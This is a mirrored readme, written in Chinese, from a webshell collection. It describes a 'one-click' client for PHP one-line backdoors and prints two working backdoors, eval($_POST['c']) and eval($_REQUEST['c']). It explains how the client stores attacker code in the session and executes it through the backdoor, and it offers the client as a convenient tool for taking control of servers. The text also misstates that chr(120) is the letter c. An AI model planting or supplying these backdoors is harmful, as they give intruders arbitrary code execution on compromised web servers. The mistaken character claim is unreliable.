mirror of
https://github.com/tennc/webshell
synced 2024-11-25 20:50:18 +00:00
38 lines
No EOL
876 B
Text
38 lines
No EOL
876 B
Text
零魂PHP一句话木马客户端(一键提交版)
|
||
|
||
Author:zerosoul(零魂)
|
||
|
||
|
||
|
||
一句话:
|
||
<?php eval($_POST['c'])?>
|
||
<?php eval($_REQUEST['c'])?>
|
||
|
||
海洋顶端有个一键提交版的ASP一句话客户端,很方便,一次提交之后,一句话就可以当大马用了。
|
||
|
||
但是PHP一句话一直没有见这样的客户端,网上居然还有转的到处都是的工具,结果下载下来不能用。
|
||
|
||
比较喜欢一句话的一键提交这种形式,所以花了2x半个通宵的时间做了这个东西,思路参考的是海洋,客户端的CSS也是修改它的,呵呵。
|
||
|
||
由于一键提交版的特殊性,暂时是不能随心所欲的换密码的,这个客户端的密码是字母c。
|
||
|
||
|
||
大概原理:
|
||
|
||
一键提交版的一句话客户端连接成功之后,每次POST数据的时候, 假设一句话密码是c,都要先让本地表单:
|
||
|
||
c = session_start();eval($_SESSION[chr(120)]);
|
||
|
||
chr(120)就是字母c,为了避免单引号写成chr(120)形式。
|
||
|
||
然后一句话在eval($_POST[c])的时候,才能执行保存在Session中的我们的PHP代码。
|
||
|
||
想用其它密码的朋友可以依据这个原理修改。
|
||
|
||
|
||
|
||
|
||
|
||
|
||
Blog
|
||
http://hi.baidu.com/0soul |